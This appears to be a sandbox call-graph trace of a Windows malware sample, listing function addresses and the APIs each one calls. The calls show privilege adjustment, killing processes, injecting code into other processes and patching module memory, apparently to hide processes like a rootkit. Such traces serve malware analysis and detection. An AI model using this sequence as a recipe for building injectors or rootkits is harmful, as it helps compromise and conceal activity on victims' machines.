__CxxCallCatchBlock 9 API calls 16948->16952 16949->16915 16951 20175eba605 16950->16951 17031 20175eb9838 RtlUnwindEx 16951->17031 16955 20175eba341 16952->16955 16953->16942 16957 20175eb9324 __CxxCallCatchBlock 9 API calls 16955->16957 16956->16919 16959 20175eba34a 16957->16959 16995 20175ebb1dc 16959->16995 16963 20175eba35e 17002 20175ebb2cc 16963->17002 16965 20175eba6d1 17051 20175ebc2f4 16965->17051 16967->16937 16968 20175eba366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 16968->16965 17046 20175eb9178 16968->17046 16971 20175eb9324 __CxxCallCatchBlock 9 API calls 16970->16971 16972 20175eb9a02 16971->16972 16972->16898 16976 20175eb9662 __FrameHandler3::ExecutionInCatch 16973->16976 16974 20175eb968c RtlLookupFunctionEntry 16974->16976 16975 20175eb96d4 16975->16902 16976->16974 16976->16975 16978 20175eb958b 16977->16978 16979 20175eb9560 16977->16979 16978->16905 16979->16978 16980 20175eb9324 __CxxCallCatchBlock 9 API calls 16979->16980 16980->16979 16982 20175ebb169 __FrameHandler3::ExecutionInCatch 16981->16982 16983 20175eb9634 __SetUnwindTryBlock RtlLookupFunctionEntry 16982->16983 16984 20175ebb17e 16983->16984 17054 20175eb9db4 16984->17054 16987 20175ebb190 __FrameHandler3::GetHandlerSearchState 17057 20175eb9dec 16987->17057 16988 20175ebb1b3 16989 20175eb9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 16988->16989 16990 20175eba28e 16989->16990 16990->16915 16990->16917 16990->16921 16993 20175eb9324 __CxxCallCatchBlock 9 API calls 16992->16993 16994 20175eb9a1a 16993->16994 16994->16915 16994->16946 16996 20175ebb2c3 16995->16996 16999 20175ebb207 16995->16999 16997 20175eba35a 16997->16917 16997->16963 16998 20175eb99e0 9 API calls 16998->16999 16999->16997 16999->16998 17000 20175eb99cc Is_bad_exception_allowed 9 API calls 16999->17000 17001 20175eba96c 9 API calls 16999->17001 17000->16999 17001->16999 17003 20175ebb339 17002->17003 17005 20175ebb2e9 Is_bad_exception_allowed 17002->17005 17003->16968 17004 20175eb99cc 9 API calls Is_bad_exception_allowed 17004->17005 17005->17003 17005->17004 17007 20175ebaa28 17006->17007 17008 20175eba999 17006->17008 17007->16942 17009 20175eb99cc Is_bad_exception_allowed 9 API calls 17008->17009 17010 20175eba9a2 17009->17010 17010->17007 17011 20175eba9bb 17010->17011 17012 20175eb99cc Is_bad_exception_allowed 9 API calls 17010->17012 17011->17007 17013 20175eb99cc Is_bad_exception_allowed 9 API calls 17011->17013 17014 20175eba9e7 17011->17014 17012->17011 17013->17014 17015 20175eb99e0 9 API calls 17014->17015 17016 20175eba9fb 17015->17016 17016->17007 17017 20175ebaa14 17016->17017 17018 20175eb99cc Is_bad_exception_allowed 9 API calls 17016->17018 17019 20175eb99e0 9 API calls 17017->17019 17018->17017 17019->17007 17021 20175eb9634 __SetUnwindTryBlock RtlLookupFunctionEntry 17020->17021 17022 20175eba195 17021->17022 17023 20175eb99cc Is_bad_exception_allowed 9 API calls 17022->17023 17024 20175eba1cd 17023->17024 17025 20175eb9838 9 API calls 17024->17025 17026 20175eba211 17025->17026 17026->16942 17028 20175eb95b8 __FrameHandler3::ExecutionInCatch 17027->17028 17029 20175eb9540 __FrameHandler3::ExecutionInCatch 9 API calls 17028->17029 17030 20175eb95c2 17029->17030 17030->16932 17032 20175eb8070 _invalid_parameter_noinfo 8 API calls 17031->17032 17033 20175eb9932 17032->17033 17033->16956 17035 20175eba735 17034->17035 17040 20175eba948 17034->17040 17036 20175eb9324 __CxxCallCatchBlock 9 API calls 17035->17036 17037 20175eba73a 17036->17037 17038 20175eba759 EncodePointer 17037->17038 17043 20175eba7ac 17037->17043 17039 20175eb9324 __CxxCallCatchBlock 9 API calls 17038->17039 17041 20175eba769 17039->17041 17040->16956 17041->17043 17060 20175eb94ec 17041->17060 17043->17040 17044 20175eba158 19 API calls 17043->17044 17045 20175eb99cc 9 API calls Is_bad_exception_allowed 17043->17045 17044->17043 17045->17043 17047 20175eb9197 17046->17047 17048 20175eb91c0 RtlPcToFileHeader 17047->17048 17049 20175eb91e2 RaiseException 17047->17049 17050 20175eb91d8 17048->17050 17049->16965 17050->17049 17052 20175ebcab0 _invalid_parameter_noinfo 14 API calls 17051->17052 17053 20175ebc2fd 17052->17053 17055 20175eb9634 __SetUnwindTryBlock RtlLookupFunctionEntry 17054->17055 17056 20175eb9dc7 17055->17056 17056->16987 17056->16988 17058 20175eb9634 __SetUnwindTryBlock RtlLookupFunctionEntry 17057->17058 17059 20175eb9e06 17058->17059 17059->16990 17061 20175eb9324 __CxxCallCatchBlock 9 API calls 17060->17061 17062 20175eb9518 17061->17062 17062->17043 16139 20175ec0fa8 16140 20175ec0fcc 16139->16140 16143 20175eb8070 16140->16143 16144 20175eb8079 16143->16144 16145 20175eb8084 16144->16145 16146 20175eb8848 IsProcessorFeaturePresent 16144->16146 16147 20175eb8860 16146->16147 16152 20175eb891c RtlCaptureContext 16147->16152 16153 20175eb8936 RtlLookupFunctionEntry 16152->16153 16154 20175eb894c RtlVirtualUnwind 16153->16154 16155 20175eb8873 16153->16155 16154->16153 16154->16155 16156 20175eb8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16155->16156 16157 20175eb33a8 16158 20175eb33cf 16157->16158 16159 20175eb349c 16158->16159 16160 20175eb33ec PdhGetCounterInfoW 16158->16160 16160->16159 16161 20175eb340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 16160->16161 16162 20175eb3440 StrCmpW 16161->16162 16163 20175eb3488 GetProcessHeap HeapFree 16161->16163 16162->16163 16164 20175eb3455 16162->16164 16163->16159 16164->16163 16166 20175eb3950 StrCmpNW 16164->16166 16167 20175eb39f2 16166->16167 16168 20175eb3982 StrStrW 16166->16168 16167->16164 16168->16167 16169 20175eb399b StrToIntW 16168->16169 16169->16167 16170 20175eb39c3 16169->16170 16170->16167 16176 20175eb1a30 OpenProcess 16170->16176 16177 20175eb1a64 K32GetModuleFileNameExW 16176->16177 16178 20175eb1ab6 16176->16178 16179 20175eb1a7e PathFindFileNameW lstrlenW 16177->16179 16180 20175eb1aad CloseHandle 16177->16180 16178->16167 16182 20175eb3f88 16178->16182 16179->16180 16181 20175eb1a9c StrCpyW 16179->16181 16180->16178 16181->16180 16183 20175eb3f95 StrCmpNIW 16182->16183 16184 20175eb39e4 16182->16184 16183->16184 16184->16167 16185 20175eb1cfc 16184->16185 16186 20175eb1d13 16185->16186 16187 20175eb1d1c 16185->16187 16188 20175eb1530 2 API calls 16186->16188 16187->16167 16188->16187 18476 20175eb81c0 18477 20175eb81c9 __scrt_acquire_startup_lock 18476->18477 18479 20175eb81cd 18477->18479 18480 20175ebbbb4 18477->18480 18481 20175ebbbed 18480->18481 18482 20175ebbbd4 18480->18482 18481->18479 18483 20175ebbbdc 18482->18483 18484 20175ebbbf2 18482->18484 18485 20175ebd1f4 __std_exception_copy 13 API calls 18483->18485 18486 20175ebe864 56 API calls 18484->18486 18487 20175ebbbe1 18485->18487 18488 20175ebbbf7 18486->18488 18489 20175ebd04c _invalid_parameter_noinfo 38 API calls 18487->18489 18509 20175ebdf38 GetModuleFileNameW 18488->18509 18489->18481 18494 20175ebbb54 13 API calls 18495 20175ebbc61 18494->18495 18496 20175ebbc7a 18495->18496 18497 20175ebbc69 18495->18497 18499 20175ebb994 14 API calls 18496->18499 18498 20175ebd1f4 __std_exception_copy 13 API calls 18497->18498 18507 20175ebbc6e 18498->18507 18501 20175ebbc96 18499->18501 18500 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18500->18481 18502 20175ebbcdf 18501->18502 18503 20175ebbcc6 18501->18503 18501->18507 18505 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18502->18505 18504 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18503->18504 18506 20175ebbccf 18504->18506 18505->18507 18508 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18506->18508 18507->18500 18508->18481 18510 20175ebdf7d GetLastError 18509->18510 18511 20175ebdf91 18509->18511 18527 20175ebd184 18510->18527 18513 20175ebdd78 14 API calls 18511->18513 18515 20175ebdfbf 18513->18515 18514 20175ebdf8a 18516 20175eb8070 _invalid_parameter_noinfo 8 API calls 18514->18516 18517 20175ebf198 9 API calls 18515->18517 18520 20175ebdfd0 18515->18520 18519 20175ebbc0e 18516->18519 18517->18520 18521 20175ebb994 18519->18521 18532 20175ebde1c 18520->18532 18523 20175ebb9d2 18521->18523 18525 20175ebba38 18523->18525 18549 20175ebec1c 18523->18549 18524 20175ebbb25 18524->18494 18525->18524 18526 20175ebec1c 14 API calls 18525->18526 18526->18525 18546 20175ebd1d0 18527->18546 18529 20175ebd191 Concurrency::details::SchedulerProxy::DeleteThis 18530 20175ebd1f4 __std_exception_copy 13 API calls 18529->18530 18531 20175ebd1a1 18530->18531 18531->18514 18533 20175ebde40 18532->18533 18534 20175ebde5b 18532->18534 18533->18514 18535 20175ebece8 WideCharToMultiByte 18534->18535 18540 20175ebde60 18534->18540 18536 20175ebdeb7 18535->18536 18537 20175ebdebe GetLastError 18536->18537 18536->18540 18541 20175ebdee9 18536->18541 18539 20175ebd184 13 API calls 18537->18539 18538 20175ebd1f4 __std_exception_copy 13 API calls 18538->18533 18542 20175ebdecb 18539->18542 18540->18533 18540->18538 18543 20175ebece8 WideCharToMultiByte 18541->18543 18544 20175ebd1f4 __std_exception_copy 13 API calls 18542->18544 18545 20175ebdf10 18543->18545 18544->18533 18545->18533 18545->18537 18547 20175ebcb10 __std_exception_copy 13 API calls 18546->18547 18548 20175ebd1d9 18547->18548 18548->18529 18550 20175ebeba8 18549->18550 18551 20175ebdd78 14 API calls 18550->18551 18552 20175ebebcc 18551->18552 18552->18523 17255 20175eb2ab4 TlsGetValue TlsGetValue TlsGetValue 17256 20175eb2b0d 17255->17256 17261 20175eb2b79 17255->17261 17258 20175eb2b15 17256->17258 17256->17261 17257 20175eb2b74 17258->17257 17259 20175eb2c32 TlsSetValue TlsSetValue TlsSetValue 17258->17259 17260 20175eb3f88 StrCmpNIW 17258->17260 17259->17257 17260->17258 17261->17257 17261->17259 17262 20175eb3f88 StrCmpNIW 17261->17262 17262->17261 19012 20175eb34b8 19013 20175eb34e8 19012->19013 19014 20175eb35a1 19013->19014 19015 20175eb3505 PdhGetCounterInfoW 19013->19015 19015->19014 19016 20175eb3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 19015->19016 19017 20175eb358d GetProcessHeap HeapFree 19016->19017 19018 20175eb3555 StrCmpW 19016->19018 19017->19014 19018->19017 19020 20175eb356a 19018->19020 19019 20175eb3950 12 API calls 19019->19020 19020->19017 19020->19019 15627 140003728 15628 140003735 15627->15628 15630 140003755 ConnectNamedPipe 15628->15630 15631 14000374a Sleep 15628->15631 15638 140002300 AllocateAndInitializeSid 15628->15638 15632 1400037b3 Sleep 15630->15632 15633 140003764 ReadFile 15630->15633 15631->15628 15634 1400037be DisconnectNamedPipe 15632->15634 15633->15634 15635 140003787 15633->15635 15634->15630 15637 1400031c4 31 API calls 15635->15637 15636 14000378d WriteFile 15636->15634 15637->15636 15639 14000241b 15638->15639 15640 14000235d SetEntriesInAclW 15638->15640 15639->15628 15640->15639 15641 1400023a1 LocalAlloc 15640->15641 15641->15639 15642 1400023b5 InitializeSecurityDescriptor 15641->15642 15642->15639 15643 1400023c5 SetSecurityDescriptorDacl 15642->15643 15643->15639 15644 1400023dc CreateNamedPipeW 15643->15644 15644->15639 19027 20175eb5c8d 19029 20175eb5c94 19027->19029 19028 20175eb5cfb 19029->19028 19030 20175eb5d77 VirtualProtect 19029->19030 19031 20175eb5da3 GetLastError 19030->19031 19032 20175eb5db1 19030->19032 19031->19032 16189 20175ec479d 16192 20175ebaf34 16189->16192 16193 20175ebaf4e 16192->16193 16195 20175ebaf9b 16192->16195 16194 20175eb9324 __CxxCallCatchBlock 9 API calls 16193->16194 16193->16195 16194->16195 15478 20175ebf6a0 15489 20175ebc558 EnterCriticalSection 15478->15489 15480 20175ebf6b0 15481 20175ec1c5c 39 API calls 15480->15481 15482 20175ebf6b9 15481->15482 15483 20175ebf6c7 15482->15483 15484 20175ebf498 41 API calls 15482->15484 15485 20175ebc5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15483->15485 15486 20175ebf6c2 15484->15486 15487 20175ebf6d3 15485->15487 15488 20175ebf598 GetStdHandle GetFileType 15486->15488 15488->15483 15490 140002d38 15493 140002d4c 15490->15493 15494 140002d5e OpenMutexW 15493->15494 15495 140002d84 CloseHandle 15494->15495 15496 140002d77 Sleep 15494->15496 15541 140002a0c 15495->15541 15496->15494 15499 140002a0c 14 API calls 15500 140002da5 GetCurrentProcessId OpenProcess 15499->15500 15501 140002dc3 OpenProcessToken 15500->15501 15502 140002e39 RegOpenKeyExW 15500->15502 15503 140002dd9 LookupPrivilegeValueW 15501->15503 15504 140002e30 CloseHandle 15501->15504 15505 140002d41 ExitProcess 15502->15505 15506 140002e6a RegQueryValueExW 15502->15506 15503->15504 15507 140002df0 AdjustTokenPrivileges 15503->15507 15504->15502 15506->15505 15508 140002e9a RegQueryValueExW 15506->15508 15507->15504 15509 140002e2a GetLastError 15507->15509 15508->15505 15510 140002eca GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15508->15510 15509->15504 15510->15505 15511 140002f3c RegQueryValueExW 15510->15511 15511->15505 15512 140002f6c RegCloseKey GetCurrentProcessId 15511->15512 15555 14000200c GetProcessHeap HeapAlloc 15512->15555 15514 140002f83 RegCreateKeyExW 15515 14000307d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 15514->15515 15516 140002fc0 ConvertStringSecurityDescriptorToSecurityDescriptorW 15514->15516 15519 14000151c 50 API calls 15515->15519 15517 140003002 RegCreateKeyExW 15516->15517 15518 140002fe8 RegSetKeySecurity LocalFree 15516->15518 15520 140003073 RegCloseKey 15517->15520 15521 14000303c GetCurrentProcessId RegSetValueExW RegCloseKey 15517->15521 15518->15517 15522 140003107 15519->15522 15520->15515 15521->15520 15523 140003113 ShellExecuteW 15522->15523 15524 140003145 15522->15524 15523->15523 15523->15524 15525 14000148c 6 API calls 15524->15525 15526 14000314d 15525->15526 15527 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15526->15527 15528 140003156 15527->15528 15529 14000148c 6 API calls 15528->15529 15530 14000315f 15529->15530 15531 14000148c 6 API calls 15530->15531 15532 140003168 15531->15532 15533 14000148c 6 API calls 15532->15533 15534 140003171 15533->15534 15535 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15534->15535 15536 14000317a 15535->15536 15537 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15536->15537 15538 140003183 15537->15538 15539 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 15538->15539 15540 14000318c GetProcessHeap HeapFree SleepEx 15539->15540 15540->15505 15542 140002a15 StrCpyW StrCatW GetModuleHandleW 15541->15542 15543 140002bdf 15541->15543 15542->15543 15544 140002a66 GetCurrentProcess K32GetModuleInformation 15542->15544 15543->15499 15545 140002bd6 FreeLibrary 15544->15545 15546 140002a96 CreateFileW 15544->15546 15545->15543 15546->15545 15547 140002acb CreateFileMappingW 15546->15547 15548 140002af4 MapViewOfFile 15547->15548 15549 140002bcd CloseHandle 15547->15549 15550 140002bc4 CloseHandle 15548->15550 15551 140002b17 15548->15551 15549->15545 15550->15549 15551->15550 15552 140002b30 lstrcmpiA 15551->15552 15554 140002b6e 15551->15554 15552->15551 15553 140002b70 VirtualProtect VirtualProtect 15552->15553 15553->15550 15554->15550 15561 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 15555->15561 15557 1400020a5 GetProcessHeap HeapFree 15558 140002050 15558->15557 15559 140002071 OpenProcess 15558->15559 15559->15558 15560 140002087 TerminateProcess CloseHandle 15559->15560 15560->15558 15562 140001e58 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 15561->15562 15566 140001d7d 15561->15566 15562->15558 15563 140001d92 OpenProcess 15564 140001daf K32EnumProcessModulesEx 15563->15564 15563->15566 15565 140001e43 CloseHandle 15564->15565 15564->15566 15565->15566 15566->15562 15566->15563 15566->15565 15567 140001de9 ReadProcessMemory 15566->15567 15568 140001e0b 15567->15568 15568->15565 15568->15566 15568->15567 16388 20175ec1398 16389 20175ec13ae 16388->16389 16390 20175ec13f5 16389->16390 16391 20175ec140e 16389->16391 16397 20175ebd1f4 16390->16397 16396 20175ec1405 16391->16396 16403 20175ebdd78 16391->16403 16411 20175ebcb10 16397->16411 16400 20175ebd04c 16479 20175ebcef8 16400->16479 16404 20175ebdd9c 16403->16404 16410 20175ebdd97 16403->16410 16405 20175ebcab0 _invalid_parameter_noinfo 14 API calls 16404->16405 16404->16410 16406 20175ebddb7 16405->16406 16565 20175ebffb4 16406->16565 16410->16396 16412 20175ebcb59 GetLastError 16411->16412 16414 20175ebcb2f __std_exception_copy 16411->16414 16413 20175ebcb6c 16412->16413 16415 20175ebcb8a SetLastError 16413->16415 16417 20175ebcb87 16413->16417 16419 20175ebc940 _invalid_parameter_noinfo 11 API calls 16413->16419 16416 20175ebcb54 16414->16416 16420 20175ebc940 GetLastError 16414->16420 16415->16416 16416->16400 16417->16415 16419->16417 16421 20175ebc966 16420->16421 16422 20175ebc96c SetLastError 16421->16422 16438 20175ebd220 16421->16438 16424 20175ebc9e5 16422->16424 16424->16416 16426 20175ebc9a5 FlsSetValue 16429 20175ebc9c8 16426->16429 16430 20175ebc9b1 FlsSetValue 16426->16430 16427 20175ebc995 FlsSetValue 16445 20175ebd2a0 16427->16445 16451 20175ebc758 16429->16451 16432 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 16430->16432 16437 20175ebc9c6 SetLastError 16432->16437 16437->16424 16439 20175ebd231 _invalid_parameter_noinfo 16438->16439 16440 20175ebd282 16439->16440 16441 20175ebd266 HeapAlloc 16439->16441 16456 20175ebb470 16439->16456 16443 20175ebd1f4 __std_exception_copy 12 API calls 16440->16443 16441->16439 16442 20175ebc987 16441->16442 16442->16426 16442->16427 16443->16442 16446 20175ebc9a3 16445->16446 16447 20175ebd2a5 HeapFree 16445->16447 16446->16422 16447->16446 16448 20175ebd2c0 GetLastError 16447->16448 16449 20175ebd2cd Concurrency::details::SchedulerProxy::DeleteThis 16448->16449 16450 20175ebd1f4 __std_exception_copy 11 API calls 16449->16450 16450->16446 16465 20175ebc630 16451->16465 16459 20175ebb4c0 16456->16459 16464 20175ebc558 EnterCriticalSection 16459->16464 16477 20175ebc558 EnterCriticalSection 16465->16477 16480 20175ebcf23 16479->16480 16487 20175ebcf94 16480->16487 16482 20175ebcf4a 16483 20175ebcf6d 16482->16483 16497 20175ebc3e0 16482->16497 16485 20175ebcf82 16483->16485 16486 20175ebc3e0 _invalid_parameter_noinfo 17 API calls 16483->16486 16485->16396 16486->16485 16510 20175ebccc8 16487->16510 16493 20175ebcfcf 16493->16482 16498 20175ebc3ef GetLastError 16497->16498 16499 20175ebc438 16497->16499 16500 20175ebc404 16498->16500 16499->16483 16501 20175ebcba0 _invalid_parameter_noinfo 14 API calls 16500->16501 16502 20175ebc41e SetLastError 16501->16502 16502->16499 16503 20175ebc441 16502->16503 16504 20175ebc3e0 _invalid_parameter_noinfo 15 API calls 16503->16504 16505 20175ebc467 16504->16505 16536 20175ebffe8 16505->16536 16511 20175ebcd1f 16510->16511 16512 20175ebcce4 GetLastError 16510->16512 16511->16493 16516 20175ebcd34 16511->16516 16513 20175ebccf4 16512->16513 16523 20175ebcba0 16513->16523 16517 20175ebcd50 GetLastError SetLastError 16516->16517 16518 20175ebcd68 16516->16518 16517->16518 16518->16493 16519 20175ebd06c IsProcessorFeaturePresent 16518->16519 16520 20175ebd07f 16519->16520 16528 20175ebcd80 16520->16528 16524 20175ebcbc8 FlsGetValue 16523->16524 16525 20175ebcbc4 16523->16525 16524->16525 16526 20175ebcbde SetLastError 16525->16526 16527 20175ebc940 _invalid_parameter_noinfo 13 API calls 16525->16527 16526->16511 16527->16526 16529 20175ebcdba _invalid_parameter_noinfo 16528->16529 16530 20175ebcde2 RtlCaptureContext RtlLookupFunctionEntry 16529->16530 16531 20175ebce2e RtlVirtualUnwind 16530->16531 16532 20175ebce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16530->16532 16531->16532 16535 20175ebceb6 _invalid_parameter_noinfo 16532->16535 16533 20175eb8070 _invalid_parameter_noinfo 8 API calls 16534 20175ebced5 GetCurrentProcess TerminateProcess 16533->16534 16535->16533 16537 20175ec0001 16536->16537 16539 20175ebc48f 16536->16539 16537->16539 16544 20175ec0a40 16537->16544 16540 20175ec0054 16539->16540 16541 20175ec006d 16540->16541 16542 20175ebc49f 16540->16542 16541->16542 16562 20175ebe8c4 16541->16562 16542->16483 16553 20175ebcab0 16544->16553 16546 20175ec0a4f 16552 20175ec0a95 16546->16552 16561 20175ebc558 EnterCriticalSection 16546->16561 16552->16539 16554 20175ebcb10 __std_exception_copy 13 API calls 16553->16554 16556 20175ebcab9 16554->16556 16555 20175ebcabe 16555->16546 16556->16555 16557 20175ebcae8 FlsGetValue 16556->16557 16558 20175ebcae4 16556->16558 16557->16558 16559 20175ebcafe 16558->16559 16560 20175ebc940 _invalid_parameter_noinfo 13 API calls 16558->16560 16559->16546 16560->16559 16563 20175ebcab0 _invalid_parameter_noinfo 14 API calls 16562->16563 16564 20175ebe8cd 16563->16564 16566 20175ebddda 16565->16566 16567 20175ebffc9 16565->16567 16569 20175ec0020 16566->16569 16567->16566 16568 20175ec0a40 _invalid_parameter_noinfo 14 API calls 16567->16568 16568->16566 16570 20175ec0048 16569->16570 16571 20175ec0035 16569->16571 16570->16410 16571->16570 16572 20175ebe8c4 _invalid_parameter_noinfo 14 API calls 16571->16572 16572->16570 16574 20175ebf370 VirtualProtect 19059 20175ebf870 19060 20175ebf8a0 19059->19060 19062 20175ebf8c7 19059->19062 19061 20175ebcb10 __std_exception_copy 13 API calls 19060->19061 19060->19062 19066 20175ebf8b4 19060->19066 19061->19066 19063 20175ebf99c 19062->19063 19082 20175ebc558 EnterCriticalSection 19062->19082 19065 20175ebfa03 19063->19065 19067 20175ebf9ca 19063->19067 19068 20175ebfab3 19063->19068 19079 20175ebfa61 19065->19079 19083 20175ebc5ac LeaveCriticalSection 19065->19083 19066->19062 19069 20175ebf949 19066->19069 19077 20175ebf904 19066->19077 19067->19065 19076 20175ebcab0 _invalid_parameter_noinfo 14 API calls 19067->19076 19073 20175ebfac0 19068->19073 19084 20175ebc5ac LeaveCriticalSection 19068->19084 19070 20175ebd1f4 __std_exception_copy 13 API calls 19069->19070 19074 20175ebf94e 19070->19074 19075 20175ebd04c _invalid_parameter_noinfo 38 API calls 19074->19075 19075->19077 19078 20175ebf9f3 19076->19078 19080 20175ebcab0 _invalid_parameter_noinfo 14 API calls 19078->19080 19081 20175ebcab0 14 API calls _invalid_parameter_noinfo 19079->19081 19080->19065 19081->19079 18577 20175ebc180 18580 20175ebbf38 18577->18580 18587 20175ebbf00 18580->18587 18588 20175ebbf10 18587->18588 18589 20175ebbf15 18587->18589 18590 20175ebbebc 13 API calls 18588->18590 18591 20175ebbf1c 18589->18591 18590->18589 18592 20175ebbf2c 18591->18592 18593 20175ebbf31 18591->18593 18594 20175ebbebc 13 API calls 18592->18594 18595 20175ebbebc 18593->18595 18594->18593 18596 20175ebbef2 18595->18596 18597 20175ebbec1 18595->18597 18598 20175ebbeea 18597->18598 18599 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18597->18599 18600 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18598->18600 18599->18597 18600->18596 19112 20175ec387c 19113 20175ec38b4 __GSHandlerCheckCommon 19112->19113 19114 20175ec38e0 19113->19114 19116 20175eb9a24 19113->19116 19117 20175eb9324 __CxxCallCatchBlock 9 API calls 19116->19117 19118 20175eb9a4e 19117->19118 19119 20175eb9324 __CxxCallCatchBlock 9 API calls 19118->19119 19120 20175eb9a5b 19119->19120 19121 20175eb9324 __CxxCallCatchBlock 9 API calls 19120->19121 19122 20175eb9a64 19121->19122 19122->19114 18601 20175eb5974 18602 20175eb597a 18601->18602 18613 20175eb7fa0 18602->18613 18606 20175eb59de 18608 20175eb5a77 18608->18606 18610 20175eb5bfd 18608->18610 18626 20175eb7b80 18608->18626 18609 20175eb5cfb 18610->18609 18611 20175eb5d77 VirtualProtect 18610->18611 18611->18606 18612 20175eb5da3 GetLastError 18611->18612 18612->18606 18614 20175eb7fab 18613->18614 18615 20175eb59bd 18614->18615 18616 20175ebb470 _invalid_parameter_noinfo 2 API calls 18614->18616 18617 20175eb7fca 18614->18617 18615->18606 18622 20175eb4400 18615->18622 18616->18614 18618 20175eb7fd5 18617->18618 18632 20175eb87b8 18617->18632 18636 20175eb87d8 18618->18636 18623 20175eb441d 18622->18623 18625 20175eb448c 18623->18625 18640 20175eb4670 18623->18640 18625->18608 18627 20175eb7bc7 18626->18627 18665 20175eb7950 18627->18665 18630 20175eb8070 _invalid_parameter_noinfo 8 API calls 18631 20175eb7bf1 18630->18631 18631->18608 18633 20175eb87c6 std::bad_alloc::bad_alloc 18632->18633 18634 20175eb9178 Concurrency::cancel_current_task 2 API calls 18633->18634 18635 20175eb87d7 18634->18635 18637 20175eb87e6 std::bad_alloc::bad_alloc 18636->18637 18638 20175eb9178 Concurrency::cancel_current_task 2 API calls 18637->18638 18639 20175eb7fdb 18638->18639 18641 20175eb46b7 18640->18641 18642 20175eb4694 18640->18642 18643 20175eb46ed 18641->18643 18660 20175eb4250 18641->18660 18642->18641 18654 20175eb4120 18642->18654 18644 20175eb471d 18643->18644 18647 20175eb4250 2 API calls 18643->18647 18648 20175eb4120 3 API calls 18644->18648 18651 20175eb4753 18644->18651 18647->18644 18648->18651 18649 20175eb4120 3 API calls 18652 20175eb476f 18649->18652 18650 20175eb4250 2 API calls 18653 20175eb478b 18650->18653 18651->18649 18651->18652 18652->18650 18652->18653 18653->18625 18655 20175eb4141 18654->18655 18656 20175eb4196 VirtualQuery 18655->18656 18657 20175eb41b0 18655->18657 18658 20175eb41ca VirtualAlloc 18655->18658 18656->18655 18656->18657 18657->18641 18658->18657 18659 20175eb41fb GetLastError 18658->18659 18659->18655 18659->18657 18663 20175eb4268 18660->18663 18661 20175eb42d7 18661->18643 18662 20175eb42bd VirtualQuery 18662->18661 18662->18663 18663->18661 18663->18662 18664 20175eb4322 GetLastError 18663->18664 18664->18663 18666 20175eb796b 18665->18666 18667 20175eb7981 SetLastError 18666->18667 18668 20175eb798f 18666->18668 18667->18668 18668->18630 17293 20175eb8672 17294 20175eb90c0 __std_exception_copy 38 API calls 17293->17294 17295 20175eb869d 17294->17295 17299 20175eb824c 17300 20175eb8270 __scrt_acquire_startup_lock 17299->17300 17301 20175ebb581 17300->17301 17302 20175ebcb10 __std_exception_copy 13 API calls 17300->17302 17303 20175ebb5aa 17302->17303 18742 20175ec494f 18743 20175ec495e 18742->18743 18744 20175ec4968 18742->18744 18746 20175ebc5ac LeaveCriticalSection 18743->18746 15569 140003668 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15570 1400036be K32EnumProcesses 15569->15570 15571 1400036d3 15570->15571 15572 14000371b SleepEx 15570->15572 15571->15572 15574 1400031c4 15571->15574 15572->15570 15575 1400031d5 15574->15575 15576 1400031fd 15574->15576 15580 140001868 OpenProcess 15575->15580 15576->15571 15579 140001868 31 API calls 15579->15576 15581 140001cd1 15580->15581 15582 1400018b0 IsWow64Process 15580->15582 15581->15579 15583 1400018c7 CloseHandle 15582->15583 15583->15581 15585 1400018ed 15583->15585 15585->15581 15586 14000192f OpenProcess 15585->15586 15586->15581 15587 14000194b OpenProcess 15586->15587 15588 140001a04 NtQueryInformationProcess 15587->15588 15589 14000196a K32GetModuleFileNameExW 15587->15589 15590 140001cc8 CloseHandle 15588->15590 15591 140001a29 15588->15591 15592 1400019b3 CloseHandle 15589->15592 15593 140001983 PathFindFileNameW lstrlenW 15589->15593 15590->15581 15591->15590 15594 140001a33 OpenProcessToken 15591->15594 15592->15588 15596 1400019c1 15592->15596 15593->15592 15595 1400019a0 StrCpyW 15593->15595 15594->15590 15597 140001a51 GetTokenInformation 15594->15597 15595->15592 15596->15588 15598 1400019e0 StrCmpIW 15596->15598 15599 140001af4 15597->15599 15600 140001a79 GetLastError 15597->15600 15598->15590 15598->15596 15602 140001afb CloseHandle 15599->15602 15600->15599 15601 140001a84 LocalAlloc 15600->15601 15601->15599 15603 140001a9a GetTokenInformation 15601->15603 15602->15590 15607 140001b0f 15602->15607 15604 140001ae2 15603->15604 15605 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 15603->15605 15606 140001ae9 LocalFree 15604->15606 15605->15606 15606->15602 15607->15590 15608 140001b9f StrStrA 15607->15608 15609 140001bc8 15607->15609 15608->15607 15610 140001bcd 15608->15610 15609->15590 15610->15590 15611 140001bf8 VirtualAllocEx 15610->15611 15611->15590 15612 140001c27 WriteProcessMemory 15611->15612 15612->15590 15613 140001c46 15612->15613 15621 140002bfc 15613->15621 15615 140001c66 15615->15590 15616 140001c74 WaitForSingleObject 15615->15616 15617 140001c83 GetExitCodeThread 15616->15617 15618 140001cbd CloseHandle 15616->15618 15619 140001ca2 VirtualFreeEx 15617->15619 15620 140001c99 15617->15620 15618->15590 15619->15618 15620->15619 15624 1400020cc GetModuleHandleA 15621->15624 15625 1400020f5 15624->15625 15626 1400020ec GetProcAddress 